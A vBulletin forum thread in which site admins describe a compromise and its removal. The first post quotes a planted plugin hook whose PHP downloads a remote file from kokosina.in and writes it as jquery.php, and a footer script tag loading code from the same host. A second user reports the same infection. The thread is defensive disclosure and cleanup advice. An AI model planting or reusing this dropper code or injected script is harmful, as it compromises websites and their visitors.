Exploit Kit Variant 11 - How to remove

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • TheWindows7Site
    Member
    • Jul 2009
    • 44

    [Forum] Exploit Kit Variant 11 - How to remove

    THIS POST IS TO SHOW WHERE I FOUND THE SCRIPT HIDING AND HOW I REMOVED IT
    THIS IS NOT TO BE USED/ABUSED


    Found this in the plugins
    Product: vBulletin
    Hook Location: ajax_complete
    Title: !
    Code:
    Code:
    $linky="http://kokosina.in/sh.txt";$saved="./jquery.php";
    $from=fopen("$linky","r");
    $to=fopen("$saved","w");
    while(!feof($from)){
    $string=fgets($from,4096);
    fputs($to,$string);
    }
    fclose($to);
    echo 'done';
    fclose($from);
    Found this in the footer template
    Code:
    <script type="text/javascript" src="http://kokosina.in/1"></script>
    So delete that plugin (if you see it in the plugin manager)
    and remove that line from the footer template (was at the top for me)

    and make sure to update your vbulletin.

    I then ran the site through http://sitecheck.sucuri.net/scanner/ to verify i removed it all.
    Last edited by TheWindows7Site; Tue 10 Jan '12, 8:09am.
  • Simtech
    Member
    • Jan 2005
    • 65
    • 5.5.x

    #2
    I also had the trojan in my footer but no ajax hooks as described. This appeared to have been hacked during the 4.09 version. I have no 3rd party add ons and was running a clean, unmoded forum.

    I've deleted the footer and deleted any reference to the kokosina.in script but I'm worried that there is an exploit in vbulletin... at least in earlier versions. I am up to date and currently running the 4.1.11 version with the patch.

    But I wanted to point out that exploits are being published at http://pastebin.com/V5b4XDSA on how to get into the admin sections of vBulletin. There's a ton of users that are having this problem with their forums being hacked.

    Comment

    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
    Working...